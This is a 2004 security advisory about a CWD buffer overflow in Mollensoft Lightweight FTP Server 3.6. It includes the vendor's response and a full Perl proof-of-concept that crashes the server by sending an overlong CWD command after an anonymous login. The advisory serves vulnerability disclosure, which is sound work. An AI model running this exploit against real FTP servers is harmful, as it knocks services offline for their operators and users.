Date: 24 May 2004 13:04:08 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [NT] Mollensoft Lightweight FTP Server CWD Buffer Overflow
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mollensoft Lightweight FTP Server CWD Buffer Overflow
------------------------------------------------------------------------
SUMMARY
STORM has discovered a security vulnerability in
<http://www.mollensoft.com/product2.htm>; Mollensoft Lightweight FTP
Server. Mollensoft Lightweight FTP Server's support for the CWD command
incorrectly verifies that the buffer the CWD command doesn't overflow any
of its internal buffers. This insufficient verification allows an
authenticated (anonymous or otherwise) user to cause the FTP server to
crash while trying to read an arbitrary memory location by issuing a
malformed CWD command.
DETAILS
Vulnerable Systems:
* Mollensoft Lightweight FTP Server version 3.6
Vendor Response:
BigAl (author) responded with:
I wrote this particular app with Visual Basic and used an FTP ActiveX COM
component and I am waiting for the component creator to get back to me
regarding the fix. Unfortunately I cannot snip off any of the commands, as
access to the command length is not available from the VB component using
straight VB Code. I am working on moving to .Net so hopefully I can have a
new FTP server out by fall time frame which is truly multi-threaded and
totally coded by me.
Exploit:
#!/usr/bin/perl
#
# Mollensoft FTP Server CMD Buffer Overflow
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441
use strict;
use IO::Socket::INET;
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
$socket->autoflush(1);
# receive greeting
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;
# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $username\r\n";
print $socket "USER $username\r\n";
select(undef, undef, undef, 0.002); # sleep of 2 milliseconds
# send PASS command
my $password = "a\@b.com";
print "PASS $password\r\n";
print $socket "PASS $password\r\n";
my $cmd = "CWD ";
$cmd .= "A" x 224; # Value can range from 224 to 1018
$cmd .= "\r\n";
print "length: ".length($cmd)."\n";
print $socket $cmd;
$repcode = "";
recv_reply($socket, $repcode);
close($socket);
exit(0);
sub usage
{
# print usage information
print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port which WarFTP is listening on\n\n";
exit(1);
}
sub recv_reply
{
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socket\n";
my $res="";
while(<$socket>)
{
$res .= $_;
if (/$repcode/) { last; }
}
return $res;
}
ADDITIONAL INFORMATION
SecurITeam would like to thank <[email protected]> STORM for finding
this vulnerability.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
